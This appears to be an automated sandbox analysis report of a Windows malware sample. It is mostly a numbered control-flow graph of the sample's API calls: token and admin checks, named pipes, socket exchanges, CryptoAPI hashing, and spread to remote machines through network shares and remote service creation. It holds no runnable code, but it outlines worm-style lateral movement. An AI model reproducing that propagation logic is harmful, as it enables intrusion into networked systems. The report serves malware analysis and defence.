5213 485befa 5210->5213 5211->5213 5212->5213 5214 485bf58 memcpy 5212->5214 5213->5197 5214->5213 5216 4858430 GetCurrentProcessId 5215->5216 5217 48584e8 5215->5217 5216->5217 5218 485843f OpenProcess 5216->5218 5217->4981 5218->5217 5219 485845c OpenProcessToken 5218->5219 5220 48584e4 CloseHandle 5219->5220 5221 4858474 DuplicateToken 5219->5221 5220->5217 5222 4858487 AllocateAndInitializeSid 5221->5222 5223 48584df CloseHandle 5221->5223 5224 48584ad CheckTokenMembership 5222->5224 5225 48584da CloseHandle 5222->5225 5223->5220 5226 48584c4 5224->5226 5227 48584d1 FreeSid 5224->5227 5225->5223 5226->5227 5228 48584c9 TerminateProcess 5226->5228 5227->5225 5228->5227 5253 4857fb7 wsprintfW GetEnvironmentVariableW 5229->5253 5232 4851027 GetEnvironmentVariableW 5234 4851043 GetSystemDirectoryW 5232->5234 5235 485106b wsprintfW 5232->5235 5233 485101c Sleep 5233->5232 5237 4851055 lstrcatW 5234->5237 5238 485109d 5234->5238 5236 4857fb7 6 API calls 5235->5236 5236->5238 5237->5235 5237->5238 5239 4851531 5238->5239 5240 4851533 5239->5240 5240->5240 5260 4851368 OpenSCManagerW 5240->5260 5243 485155a 5247 48511d0 5243->5247 5268 48511ef RegOpenKeyW 5243->5268 5247->4993 5248 48511ef 7 API calls 5249 4851582 5248->5249 5249->5247 5250 4851588 GetVersion 5249->5250 5250->5247 5251 4851592 5250->5251 5252 48511ef 7 API calls 5251->5252 5252->5247 5254 4858004 GetSystemDirectoryW 5253->5254 5257 485802c 5253->5257 5255 4851018 5254->5255 5256 4858016 lstrcatW 5254->5256 5255->5232 5255->5233 5256->5255 5256->5257 5257->5257 5258 4858046 CreateProcessW 5257->5258 5258->5255 5259 4858075 Sleep 5258->5259 5259->5255 5261 4851383 GetLastError 5260->5261 5262 485138e CreateServiceW 5260->5262 5263 48513e1 5261->5263 5264 48513c7 GetLastError 5262->5264 5265 48513c2 5262->5265 5263->5243 5277 48513e8 wsprintfW RegOpenKeyExW 5263->5277 5264->5265 5266 48513dd CloseServiceHandle 5265->5266 5267 48513da CloseServiceHandle 5265->5267 5266->5263 5267->5266 5269 4851364 
5268->5269 5270 4851212 RegQueryValueExW 5268->5270 5269->5247 5269->5248 5272 485125c 5270->5272 5273 4851356 RegCloseKey 5272->5273 5274 485134f 5272->5274 5275 48512f0 memmove memcpy RegSetValueExW 5272->5275 5273->5269 5274->5273 5275->5273 5276 4851341 RegFlushKey 5275->5276 5276->5273 5278 4851435 RegQueryValueExW 5277->5278 5279 485152b 5277->5279 5280 4851461 5278->5280 5281 4851520 RegCloseKey 5278->5281 5279->5243 5280->5281 5282 485146a RegSetValueExW 5280->5282 5281->5279 5282->5281 5283 4851488 RegSetValueExW 5282->5283 5283->5281 5284 485149f RegSetValueExW 5283->5284 5284->5281 5285 48514b9 RegSetValueExW 5284->5285 5285->5281 5286 48514d1 RegSetValueExW 5285->5286 5286->5281 5287 48514ef RegSetValueExW 5286->5287 5287->5281 5288 4851507 5287->5288 5288->5281 5288->5288 5290 4856c5d 5289->5290 5293 4856bdd 5289->5293 5290->5005 5291 4856c53 GetProcessHeap HeapFree 5291->5290 5292 4856c49 GetProcessHeap HeapFree 5292->5291 5293->5291 5293->5292 5294 4856c2e GetProcessHeap HeapFree 5293->5294 5295 4856c1c GetProcessHeap HeapFree 5293->5295 5294->5293 5295->5294 5297 48564d4 CommandLineToArgvW 5296->5297 5298 48564c0 5296->5298 5299 4856528 5297->5299 5303 48564e8 5297->5303 5298->5297 5299->5016 5300 4856521 LocalFree 5300->5299 5301 4856520 5301->5300 5303->5300 5303->5301 5318 4856b95 5303->5318 5305 48569c7 5304->5305 5305->5305 5306 48569d2 GetProcessHeap HeapAlloc 5305->5306 5307 4856a9e 5306->5307 5308 48569f9 memcpy 5306->5308 5307->5016 5310 4856a27 5308->5310 5310->5310 5311 4856a32 GetProcessHeap HeapAlloc 5310->5311 5312 4856a94 GetProcessHeap HeapFree 5311->5312 5313 4856a4f memcpy 5311->5313 5312->5307 5315 4856e66 14 API calls 5313->5315 5316 4856a84 5315->5316 5316->5307 5317 4856a8b GetProcessHeap HeapFree 5316->5317 5317->5312 5319 4856b9f 5318->5319 5321 4856bc9 5318->5321 5320 4856e66 14 API calls 5319->5320 5319->5321 5320->5321 5321->5303 5322->5023 5323->5031 5325 4857153 GetCurrentProcess 5324->5325 5325->5039 5327 4856ff6 
5326->5327 5328 4856fd2 WriteFile 5326->5328 5327->5052 5327->5053 5329 4856fef CloseHandle 5328->5329 5330 4856fe9 5328->5330 5329->5327 5330->5329 5331 4856fee 5330->5331 5331->5329 5333 485713d 5332->5333 5334 4857039 InitializeSecurityDescriptor 5332->5334 5334->5333 5335 485704a SetSecurityDescriptorDacl 5334->5335 5335->5333 5336 485705f CreateNamedPipeW 5335->5336 5336->5336 5337 485707d ConnectNamedPipe 5336->5337 5338 485708d 5337->5338 5339 485712f CloseHandle 5337->5339 5340 4857090 PeekNamedPipe 5338->5340 5341 48570bf GetProcessHeap HeapAlloc 5338->5341 5342 48570ae Sleep 5338->5342 5343 48570bd 5338->5343 5339->5336 5340->5338 5344 485711d FlushFileBuffers DisconnectNamedPipe 5341->5344 5345 48570d3 ReadFile 5341->5345 5342->5338 5343->5344 5344->5339 5346 4857112 GetProcessHeap HeapFree 5345->5346 5347 48570ec 5345->5347 5346->5344 5347->5346 5348 48570f4 StrChrW 5347->5348 5349 48569ae 24 API calls 5347->5349 5348->5346 5348->5347 5349->5346 5359 4856b0e 5350->5359 5352 485a396 GetProcessHeap HeapFree 5356 485a35c 5356->5352 5357 485a390 5356->5357 5362 4859f27 5356->5362 5368 4856b5f 5356->5368 5372 4856ad0 5356->5372 5375 4856b46 GetProcessHeap HeapFree 5357->5375 5376 4856ced GetProcessHeap HeapAlloc 5359->5376 5363 4859f34 5362->5363 5388 4856735 5363->5388 5365 4859f51 5366 4859f6d 5365->5366 5400 4859376 PathFindFileNameW 5365->5400 5366->5356 5369 4856b71 5368->5369 5369->5369 5921 4856e1b 5369->5921 5373 4856d35 3 API calls 5372->5373 5374 4856ae1 5373->5374 5374->5356 5375->5352 5377 4856b24 5376->5377 5378 4856d0b 5376->5378 5377->5356 5382 4856d35 5378->5382 5381 4856d20 GetProcessHeap HeapFree 5381->5377 5383 4856d1c 5382->5383 5384 4856d3e 5382->5384 5383->5377 5383->5381 5384->5383 5385 4856d43 EnterCriticalSection 5384->5385 5386 4856d7e LeaveCriticalSection 5384->5386 5387 4856d92 Sleep 5384->5387 5385->5384 5386->5383 5386->5384 5387->5385 5408 4856477 GetTickCount 5388->5408 5390 4856743 wsprintfW 5392 485676a 5390->5392 5392->5392 
5393 4856775 EnterCriticalSection 5392->5393 5394 4856797 5393->5394 5395 4856792 5393->5395 5397 48567dd SetLastError 5394->5397 5398 48567bb StrCatW StrCatW 5394->5398 5409 4856628 5395->5409 5399 48567e5 LeaveCriticalSection 5397->5399 5398->5399 5399->5365 5401 485943a 5400->5401 5402 48593aa WideCharToMultiByte WideCharToMultiByte inet_addr 5400->5402 5401->5366 5403 4859403 WideCharToMultiByte 5402->5403 5404 48593f3 5402->5404 5425 4855337 GetProcessHeap HeapAlloc 5403->5425 5454 4859332 gethostbyname 5404->5454 5408->5390 5418 485686c 5409->5418 5411 4856722 5411->5394 5412 4856661 wsprintfW 5413 4856651 5412->5413 5413->5411 5413->5412 5414 48566ec StrCatW 5413->5414 5415 485671a 5413->5415 5421 4856893 5414->5421 5424 4856b46 GetProcessHeap HeapFree 5415->5424 5419 4856ced 7 API calls 5418->5419 5420 4856880 5419->5420 5420->5413 5422 4856d35 3 API calls 5421->5422 5423 48568a4 5422->5423 5423->5413 5424->5411 5426 4855365 rand 5425->5426 5427 48554fd 5425->5427 5428 4855391 5426->5428 5429 4855398 rand socket 5426->5429 5427->5401 5428->5429 5430 48553c5 htons inet_addr connect 5429->5430 5431 48554ed GetProcessHeap HeapFree 5429->5431 5432 4855406 5430->5432 5433 48554dc 5430->5433 5431->5427 5457 4851ca3 GetProcessHeap RtlAllocateHeap 5432->5457 5434 48554e6 closesocket 5433->5434 5434->5431 5437 485541c 5469 4852191 5437->5469 5453 48554bc 5578 4851dd1 GetProcessHeap HeapAlloc 5453->5578 5455 4859345 wsprintfA 5454->5455 5456 485936f 5454->5456 5455->5456 5456->5401 5456->5403 5458 4851dc7 5457->5458 5459 4851cd3 GetProcessHeap HeapAlloc 5457->5459 5458->5433 5458->5437 5460 4851db5 GetProcessHeap HeapFree 5459->5460 5461 4851ce6 htons send 5459->5461 5460->5458 5462 4851da5 GetProcessHeap HeapFree 5461->5462 5463 4851d30 recv 5461->5463 5462->5460 5463->5462 5464 4851d47 5463->5464 5464->5462 5587 4851c3a 5464->5587 5468 4851d62 5468->5462 5595 4851747 5468->5595 5470 4851eb9 11 API calls 5469->5470 5473 48521a8 5470->5473 5471 48521d0 5471->5453 
5474 48546c7 GetProcessHeap HeapAlloc 5471->5474 5472 4852054 11 API calls 5472->5473 5473->5471 5473->5472 5475 4854aa4 5474->5475 5476 48546fa 5474->5476 5509 48521dc GetProcessHeap HeapAlloc 5475->5509 5662 4852497 GetProcessHeap HeapAlloc 5476->5662 5478 48547b1 GetProcessHeap HeapFree 5478->5475 5479 485471c 5479->5478 5480 4854745 5479->5480 5487 485475a 5479->5487 5680 4852e12 GetProcessHeap HeapAlloc 5480->5680 5483 4854754 5483->5478 5715 485317c GetProcessHeap HeapAlloc 5483->5715 5485 48521dc 19 API calls 5485->5487 5487->5483 5487->5485 5489 48547ae 5487->5489 5490 485478a Sleep 5487->5490 5690 48529a2 GetProcessHeap HeapAlloc 5487->5690 5488 48547e9 GetProcessHeap HeapAlloc 5488->5478 5491 4854802 5488->5491 5489->5478 5492 4852191 22 API calls 5490->5492 5493 485480c GetProcessHeap HeapAlloc 5491->5493 5505 485486a 5491->5505 5492->5487 5495 485481d 5493->5495 5493->5505 5494 48549a6 GetProcessHeap HeapAlloc 5494->5505 5723 4853209 GetProcessHeap HeapAlloc 5495->5723 5496 4854a91 GetProcessHeap HeapFree 5496->5478 5497 4854888 Sleep GetProcessHeap HeapAlloc 5497->5496 5497->5505 5501 4854872 GetProcessHeap HeapFree 5501->5505 5503 4854a42 5741 4853680 GetProcessHeap HeapAlloc 5503->5741 5505->5494 5505->5496 5505->5497 5505->5501 5505->5503 5728 48532af GetProcessHeap HeapAlloc 5505->5728 5736 48533a4 GetProcessHeap HeapAlloc 5505->5736 5507 4854a86 5507->5496 5510 485233b 5509->5510 5511 485220b GetProcessHeap HeapAlloc 5509->5511 5510->5453 5522 4851eb9 GetProcessHeap HeapAlloc 5510->5522 5512 4852222 htons send 5511->5512 5513 485232c GetProcessHeap HeapFree 5511->5513 5514 4852320 GetProcessHeap HeapFree 5512->5514 5515 4852263 recv 5512->5515 5513->5510 5514->5513 5515->5514 5516 485227f 5515->5516 5516->5514 5517 485228c memset GetProcessHeap HeapAlloc 5516->5517 5517->5514 5518 48522b3 htons send 5517->5518 5519 48522e4 recv 5518->5519 5520 4852311 GetProcessHeap HeapFree 5518->5520 5519->5520 5521 48522fc 5519->5521 5520->5514 5521->5520 5523 
485204b 5522->5523 5524 4851ee8 GetProcessHeap HeapAlloc 5522->5524 5523->5453 5533 4852054 GetProcessHeap HeapAlloc 5523->5533 5526 4851f2e htons 5524->5526 5527 4852038 GetProcessHeap HeapFree 5524->5527 5528 4851f79 send 5526->5528 5527->5523 5530 4852028 GetProcessHeap HeapFree 5528->5530 5531 4851ffb recv 5528->5531 5530->5527 5531->5530 5532 4852012 5531->5532 5532->5530 5534 4852083 GetProcessHeap HeapAlloc 5533->5534 5535 4852188 5533->5535 5537 4852175 GetProcessHeap HeapFree 5534->5537 5538 48520ab htons 5534->5538 5535->5453 5544 4854ab5 5535->5544 5537->5535 5539 48520d6 5538->5539 5539->5539 5540 4852127 send 5539->5540 5541 4852165 GetProcessHeap HeapFree 5540->5541 5542 485213b recv 5540->5542 5541->5537 5542->5541 5543 4852152 5542->5543 5543->5541 5545 4852054 11 API calls 5544->5545 5550 4854ad3 5545->5550 5546 4854b45 5546->5453 5553 485516b 5546->5553 5547 4854b10 5549 4852f5a 12 API calls 5547->5549 5548 4852f5a 12 API calls 5548->5550 5551 4854b34 5549->5551 5550->5546 5550->5547 5550->5548 5551->5546 5552 48521dc 19 API calls 5551->5552 5552->5546 5554 4851eb9 11 API calls 5553->5554 5555 485518b 5554->5555 5556 485532d 5555->5556 5557 4852054 11 API calls 5555->5557 5556->5453 5558 48551ab 5557->5558 5558->5556 5870 4854e60 GetProcessHeap HeapAlloc 5558->5870 5561 48551c7 GetProcessHeap HeapAlloc 5561->5556 5562 48551e9 5561->5562 5879 4854f43 GetProcessHeap HeapAlloc 5562->5879 5565 4855201 GetProcessHeap HeapAlloc 5566 485531f GetProcessHeap HeapFree 5565->5566 5567 4855215 6 API calls 5565->5567 5566->5556 5568 4855311 GetProcessHeap HeapFree 5567->5568 5570 4855261 sprintf 5567->5570 5568->5566 5889 4854b5d 5570->5889 5573 4855305 GetProcessHeap HeapFree 5573->5568 5579 4851eb0 5578->5579 5580 4851dff GetProcessHeap HeapAlloc 5578->5580 5579->5434 5581 4851e13 htons send 5580->5581 5582 4851e9d GetProcessHeap HeapFree 5580->5582 5583 4851e54 recv 5581->5583 5584 4851e8d GetProcessHeap HeapFree 5581->5584 5582->5579 5583->5584 5585 
4851e6d 5583->5585 5584->5582 5585->5584 5586 4851e73 memset 5585->5586 5586->5584 5588 485686c 7 API calls 5587->5588 5589 4851c5b 5588->5589 5590 4851c99 5589->5590 5591 4851747 54 API calls 5589->5591 5592 4851c93 5589->5592 5593 4856893 3 API calls 5589->5593 5590->5462 5590->5468 5591->5589 5640 4856b46 GetProcessHeap HeapFree 5592->5640 5593->5589 5596 485175a 5595->5596 5596->5596 5597 4851765 GetProcessHeap HeapAlloc 5596->5597 5598 4851c30 5597->5598 5599 485179b CharUpperW 5597->5599 5598->5468 5601 48517be 5599->5601 5601->5601 5602 48517c9 GetProcessHeap HeapAlloc 5601->5602 5603 4851c22 GetProcessHeap HeapFree 5602->5603 5604 48517ec htons 5602->5604 5603->5598 5605 485184e 5604->5605 5605->5605 5606 4851859 send 5605->5606 5607 4851c16 GetProcessHeap HeapFree 5606->5607 5608 4851871 recv 5606->5608 5607->5603 5608->5607 5609 4851890 5608->5609 5609->5607 5610 48518d4 5609->5610 5611 48518d9 GetProcessHeap HeapAlloc 5609->5611 5610->5607 5611->5607 5612 485190a 5611->5612 5641 48515a7 GetProcessHeap HeapAlloc 5612->5641 5615 4851c08 GetProcessHeap HeapFree 5615->5607 5616 48515a7 16 API calls 5617 4851946 5616->5617 5617->5615 5618 485194e GetProcessHeap HeapAlloc 5617->5618 5619 4851968 5618->5619 5620 4851bfa GetProcessHeap HeapFree 5618->5620 5621 4851983 rand 5619->5621 5620->5615 5621->5621 5622 4851996 5621->5622 5623 48515a7 16 API calls 5622->5623 5624 48519ac 5623->5624 5625 48519b4 GetProcessHeap HeapAlloc 5624->5625 5626 4851bec GetProcessHeap HeapFree 5624->5626 5627 4851bde GetProcessHeap HeapFree 5625->5627 5628 48519c8 GetProcessHeap HeapAlloc 5625->5628 5626->5620 5627->5626 5630 4851a26 htons 5628->5630 5631 4851bc3 GetProcessHeap HeapFree 5628->5631 5632 4851a76 memcpy 5630->5632 5631->5627 5634 4851b57 send 5632->5634 5636 4851b84 recv 5634->5636 5637 4851bb3 GetProcessHeap HeapFree 5634->5637 5636->5637 5638 4851b9d memset 5636->5638 5637->5631 5638->5637 5640->5590 5642 48515f1 CryptAcquireContextW 5641->5642 5643 485173d 
5641->5643 5642->5643 5644 4851611 5642->5644 5643->5615 5643->5616 5645 4851621 5644->5645 5646 48516be CryptCreateHash 5644->5646 5647 485170b 5645->5647 5648 4851628 GetProcessHeap HeapAlloc 5645->5648 5646->5647 5650 48516d4 5646->5650 5651 4851717 CryptDestroyHash 5647->5651 5652 4851720 5647->5652 5648->5647 5649 4851642 CryptImportKey 5648->5649 5653 4851678 CryptCreateHash 5649->5653 5654 48516aa GetProcessHeap HeapFree 5649->5654 5650->5647 5655 48516de CryptHashData 5650->5655 5651->5652 5656 4851725 CryptDestroyKey 5652->5656 5657 485172e 5652->5657 5653->5654 5659 4851692 CryptSetHashParam 5653->5659 5654->5650 5655->5647 5660 48516f2 CryptGetHashParam 5655->5660 5656->5657 5657->5643 5658 4851733 CryptReleaseContext 5657->5658 5658->5643 5659->5654 5661 48516a6 5659->5661 5660->5647 5661->5654 5663 48524c5 GetProcessHeap HeapAlloc 5662->5663 5664 48526ff 5662->5664 5665 48526ec GetProcessHeap HeapFree 5663->5665 5666 48524dc rand htons 5663->5666 5664->5479 5665->5664 5667 485256f GetProcessHeap HeapAlloc 5666->5667 5668 485255f rand 5666->5668 5669 4852590 htons 5667->5669 5670 48526dc GetProcessHeap HeapFree 5667->5670 5668->5667 5668->5668 5671 48525cd rand 5669->5671 5670->5665 5671->5671 5672 48525dd GetProcessHeap HeapAlloc 5671->5672 5673 48526cc GetProcessHeap HeapFree 5672->5673 5674 48525fe memcpy memcpy send 5672->5674 5673->5670 5675 48526ba GetProcessHeap HeapFree 5674->5675 5676 485263a send 5674->5676 5675->5673 5676->5675 5678 4852653 5676->5678 5677 4852694 recv 5677->5678 5679 485269d 5677->5679 5678->5675 5678->5677 5678->5679 5679->5675 5681 4852f51 5680->5681 5682 4852e48 GetProcessHeap HeapAlloc 5680->5682 5681->5483 5683 4852e5c htons 5682->5683 5684 4852f3e GetProcessHeap HeapFree 5682->5684 5687 4852ed3 5683->5687 5684->5681 5685 4852ee7 send 5686 4852efd recv 5685->5686 5685->5687 5686->5687 5687->5685 5688 4852f2e GetProcessHeap HeapFree 5687->5688 5689 4852f2a 5687->5689 5688->5684 5689->5688 5691 48529d5 GetProcessHeap 
HeapAlloc 5690->5691 5692 4852e08 5690->5692 5693 4852df6 GetProcessHeap HeapFree 5691->5693 5694 48529eb rand htons 5691->5694 5692->5487 5693->5692 5695 4852a7e rand 5694->5695 5695->5695 5696 4852a8d 5695->5696 5697 4852a91 rand send 5696->5697 5699 4852ae5 rand htons GetProcessHeap HeapAlloc 5696->5699 5697->5696 5698 4852ac5 recv 5697->5698 5698->5696 5698->5699 5700 4852de6 GetProcessHeap HeapFree 5699->5700 5701 4852b82 htons 5699->5701 5700->5693 5702 4852bbe rand 5701->5702 5702->5702 5703 4852bce GetProcessHeap HeapAlloc 5702->5703 5704 4852dd6 GetProcessHeap HeapFree 5703->5704 5705 4852bec htons GetProcessHeap HeapAlloc 5703->5705 5704->5700 5706 4852dc3 GetProcessHeap HeapFree 5705->5706 5707 4852c72 memcpy memcpy htons 5705->5707 5706->5704 5708 4852d0c memcpy 5707->5708 5708->5708 5709 4852d25 send 5708->5709 5710 4852d3d send 5709->5710 5711 4852dae GetProcessHeap HeapFree 5709->5711 5710->5711 5714 4852d55 5710->5714 5711->5706 5712 4852d83 recv 5713 4852d8c 5712->5713 5712->5714 5713->5711 5714->5711 5714->5712 5714->5713 5716 4853201 5715->5716 5717 48531a2 rand 5715->5717 5716->5478 5716->5488 5718 48531bd rand 5717->5718 5718->5718 5719 48531ca 5718->5719 5820 4852f5a GetProcessHeap HeapAlloc 5719->5820 5724 48532a7 5723->5724 5725 4853233 htons memcpy send 5723->5725 5724->5505 5726 4853297 GetProcessHeap HeapFree 5725->5726 5727 4853293 5725->5727 5726->5724 5727->5726 5729 48532e1 GetProcessHeap HeapAlloc 5728->5729 5730 485339b GetProcessHeap HeapFree 5728->5730 5731 48532fe htons memcpy send 5729->5731 5732 4853388 GetProcessHeap HeapFree 5729->5732 5730->5503 5730->5505 5733 4853378 GetProcessHeap HeapFree 5731->5733 5734 485335a recv 5731->5734 5732->5730 5733->5732 5734->5733 5735 4853372 5734->5735 5735->5733 5737 4853441 5736->5737 5738 48533ce htons memcpy send 5736->5738 5737->5505 5739 4853431 GetProcessHeap HeapFree 5738->5739 5740 485342d 5738->5740 5739->5737 5740->5739 5742 4853d03 5741->5742 5743 48536ad GetProcessHeap 
HeapAlloc 5741->5743 5742->5507 5792 48541e9 GetProcessHeap HeapAlloc 5742->5792 5744 4853cf7 GetProcessHeap HeapFree 5743->5744 5745 48536c0 GetProcessHeap HeapAlloc 5743->5745 5744->5742 5746 4853ce1 GetProcessHeap HeapFree 5745->5746 5747 48536dc 5745->5747 5746->5744 5748 4853b39 5747->5748 5749 48536e8 5747->5749 5753 4853209 7 API calls 5748->5753 5750 48533a4 7 API calls 5749->5750 5751 4853745 5750->5751 5752 4853cd1 GetProcessHeap HeapFree 5751->5752 5754 4853787 5751->5754 5757 48533a4 7 API calls 5751->5757 5752->5746 5755 4853baa 5753->5755 5754->5752 5756 485379d Sleep 5754->5756 5755->5752 5758 4853bb2 Sleep 5755->5758 5760 4853209 7 API calls 5756->5760 5757->5754 5759 4853bca 5758->5759 5762 4853209 7 API calls 5759->5762 5761 4853806 5760->5761 5761->5752 5764 4853876 5761->5764 5766 4853209 7 API calls 5761->5766 5763 4853c5b 5762->5763 5763->5752 5765 4853c5f Sleep rand 5763->5765 5764->5752 5767 4853888 Sleep 5764->5767 5768 4853209 7 API calls 5765->5768 5769 4853841 5766->5769 5770 48533a4 7 API calls 5767->5770 5772 4853cbe 5768->5772 5769->5764 5774 48533a4 7 API calls 5769->5774 5771 48538d2 5770->5771 5771->5752 5775 48533a4 7 API calls 5771->5775 5772->5752 5773 4853cc2 Sleep 5772->5773 5773->5752 5774->5764 5776 485392c 5775->5776 5776->5752 5777 4853934 GetProcessHeap HeapAlloc 5776->5777 5777->5752 5778 4853953 memset 5777->5778 5779 4853209 7 API calls 5778->5779 5780 4853978 5779->5780 5781 4853980 recv 5780->5781 5782 4853b22 GetProcessHeap HeapFree 5780->5782 5781->5782 5783 485399b 5781->5783 5782->5752 5783->5782 5784 48539a8 htons 5783->5784 5784->5782 5785 48539c1 5784->5785 5785->5782 5786 4853209 7 API calls 5785->5786 5787 4853a88 5786->5787 5787->5782 5788 4853a90 Sleep rand 5787->5788 5789 48533a4 7 API calls 5788->5789 5790 4853b0f 5789->5790 5790->5782 5791 4853b13 Sleep 5790->5791 5791->5782 5793 4854217 5792->5793 5794 4854679 5792->5794 5828 48540e3 GetProcessHeap HeapAlloc 5793->5828 5794->5507 5797 4854669 
GetProcessHeap HeapFree 5797->5794 5800 4854271 GetProcessHeap HeapFree 5801 48542a0 5800->5801 5802 4854683 5800->5802 5803 48542e8 5801->5803 5805 4853d0d 45 API calls 5801->5805 5804 48540e3 17 API calls 5802->5804 5803->5797 5807 4853d0d 45 API calls 5803->5807 5819 485465e 5804->5819 5806 48542c7 5805->5806 5806->5803 5808 48542cb GetProcessHeap HeapFree 5806->5808 5809 485431d 5807->5809 5808->5803 5809->5797 5810 4854325 GetProcessHeap HeapFree 5809->5810 5811 4854351 5810->5811 5812 4853d0d 45 API calls 5811->5812 5813 485436e 5812->5813 5813->5797 5814 4854376 GetProcessHeap HeapFree memset 5813->5814 5814->5797 5815 48543c1 5814->5815 5816 48540e3 17 API calls 5815->5816 5817 4854641 5816->5817 5818 48540e3 17 API calls 5817->5818 5817->5819 5818->5819 5819->5797 5821 4852f89 GetProcessHeap HeapAlloc 5820->5821 5822 4853068 GetProcessHeap HeapFree 5820->5822 5823 4853055 GetProcessHeap HeapFree 5821->5823 5824 4852fa6 htons memcpy send 5821->5824 5822->5716 5823->5822 5825 4853045 GetProcessHeap HeapFree 5824->5825 5826 4853025 recv 5824->5826 5825->5823 5826->5825 5827 485303c 5826->5827 5827->5825 5829 48541e0 5828->5829 5830 485410b GetProcessHeap HeapAlloc 5828->5830 5829->5797 5841 4853d0d GetProcessHeap HeapAlloc 5829->5841 5832 48541d4 GetProcessHeap HeapFree 5830->5832 5833 4854158 5830->5833 5832->5829 5834 4853209 7 API calls 5833->5834 5835 485417b 5834->5835 5836 48541c6 GetProcessHeap HeapFree 5835->5836 5837 485417f Sleep 5835->5837 5836->5832 5838 4853209 7 API calls 5837->5838 5839 48541b3 5838->5839 5839->5836 5840 48541b7 Sleep 5839->5840 5840->5836 5842 4853d41 GetProcessHeap HeapAlloc 5841->5842 5843 48540da 5841->5843 5844 4853d55 GetProcessHeap HeapAlloc 5842->5844 5845 48540cb GetProcessHeap HeapFree 5842->5845 5843->5797 5843->5800 5846 4853d72 5844->5846 5847 48540bf GetProcessHeap HeapFree 5844->5847 5845->5843 5848 4853209 7 API calls 5846->5848 5847->5845 5849 4853e4e 5848->5849 5850 4853e56 Sleep GetProcessHeap HeapAlloc 
5849->5850 5851 48540b3 GetProcessHeap HeapFree 5849->5851 5850->5851 5852 4853e79 rand 5850->5852 5851->5847 5853 48532af 12 API calls 5852->5853 5854 4853ef0 5853->5854 5855 4853ef8 memset 5854->5855 5856 485409b GetProcessHeap HeapFree 5854->5856 5857 4853209 7 API calls 5855->5857 5856->5851 5858 4853f22 5857->5858 5858->5856 5859 4853f2a recv 5858->5859 5859->5856 5860 4853f46 5859->5860 5860->5856 5861 4853f50 htons 5860->5861 5861->5856 5862 4853f73 5861->5862 5863 4853209 7 API calls 5862->5863 5864 4853feb 5863->5864 5864->5856 5865 4853ff3 Sleep 5864->5865 5866 4853209 7 API calls 5865->5866 5867 485405a 5866->5867 5867->5856 5868 485405e Sleep GetProcessHeap HeapAlloc 5867->5868 5868->5856 5869 4854084 memcpy 5868->5869 5869->5856 5871 4854f38 5870->5871 5872 4854e89 5870->5872 5871->5556 5871->5561 5872->5872 5873 4852f5a 12 API calls 5872->5873 5874 4854ee8 5873->5874 5875 4854f2f GetProcessHeap HeapFree 5874->5875 5911 4853071 GetProcessHeap HeapAlloc 5874->5911 5875->5871 5878 4854f27 GetProcessHeap HeapFree 5878->5875 5880 4855014 5879->5880 5881 4854f6f rand 5879->5881 5880->5565 5880->5566 5883 4852f5a 12 API calls 5881->5883 5884 4854fad 5883->5884 5885 4855004 GetProcessHeap HeapFree 5884->5885 5886 4853071 14 API calls 5884->5886 5885->5880 5888 4854fcb 5886->5888 5887 4854ff4 GetProcessHeap HeapFree 5887->5885 5888->5885 5888->5887 5890 4854b77 GetProcessHeap HeapAlloc 5889->5890 5892 4854c2e rand 5890->5892 5894 4854cff 5890->5894 5892->5894 5894->5573 5895 485501e 5894->5895 5896 4852f5a 12 API calls 5895->5896 5897 4855040 5896->5897 5898 485509b 5897->5898 5899 4853071 14 API calls 5897->5899 5898->5573 5902 48550a2 GetProcessHeap HeapAlloc 5898->5902 5901 4855060 5899->5901 5900 485508b GetProcessHeap HeapFree 5900->5898 5901->5898 5901->5900 5903 4855162 5902->5903 5904 48550ca 5902->5904 5903->5573 5905 4852f5a 12 API calls 5904->5905 5906 4855117 5905->5906 5907 4855155 GetProcessHeap HeapFree 5906->5907 5908 4853071 14 API calls 
                                                                      [Control-flow graph node/edge listing for the preceding function graph; rendered as a graph image in the original report]

                                                                      Control-flow Graph (function 4859534, legend: Executed / Not Executed)

                                                                      [Control-flow graph node/edge listing; rendered as a graph image in the original report]
                                                                      APIs
                                                                      • wsprintfW.USER32 ref: 0485957E
                                                                        • Part of subcall function 048588D3: PathFindFileNameW.SHLWAPI(04867BC8,75BF73E0,?,048595B2), ref: 048588E3
                                                                      • wsprintfW.USER32 ref: 048595C9
                                                                      • wsprintfW.USER32 ref: 048595EF
                                                                      • PathFindExtensionW.SHLWAPI(?,?,?,?,?,?,?,?,?), ref: 048595FC
                                                                      • wsprintfW.USER32 ref: 0485961A
                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 04859637
                                                                      • PathFileExistsW.SHLWAPI(?), ref: 04859649
                                                                      • GetLastError.KERNEL32 ref: 04859653
                                                                      • GetLastError.KERNEL32(?), ref: 04859674
                                                                      • WNetCancelConnection2W.MPR(?,00000000,00000001), ref: 048596B9
                                                                      • OpenSCManagerW.ADVAPI32(?,00000000,000F003F,?,?), ref: 04859714
                                                                      • memset.MSVCRT ref: 04859735
                                                                      • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04859742
                                                                      • wsprintfW.USER32 ref: 0485975A
                                                                      • CreateServiceW.ADVAPI32(?,?,00000000,000F01FF,00000010,00000003,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 04859783
                                                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 04859798
                                                                      • GetLastError.KERNEL32 ref: 048597A6
                                                                      • QueryServiceStatus.ADVAPI32(?,?), ref: 048597D5
                                                                      • Sleep.KERNEL32(00001388), ref: 048597E7
                                                                      • DeleteService.ADVAPI32(?), ref: 048597F7
                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 04859801
                                                                      • GetLastError.KERNEL32 ref: 04859809
                                                                      • CloseServiceHandle.ADVAPI32(?), ref: 04859822
                                                                      • GetLastError.KERNEL32 ref: 0485982A
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,75BF73E0,00000000), ref: 048568EB
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 048568F4
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856921
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000008,?,74DEE010), ref: 04856946
                                                                        • Part of subcall function 048568B5: HeapAlloc.KERNEL32(00000000), ref: 04856949
                                                                        • Part of subcall function 048568B5: memcpy.MSVCRT(?,?,?), ref: 04856978
                                                                        • Part of subcall function 048568B5: GetProcessHeap.KERNEL32(00000000,?,?), ref: 04856995
                                                                        • Part of subcall function 048568B5: HeapFree.KERNEL32(00000000), ref: 04856998
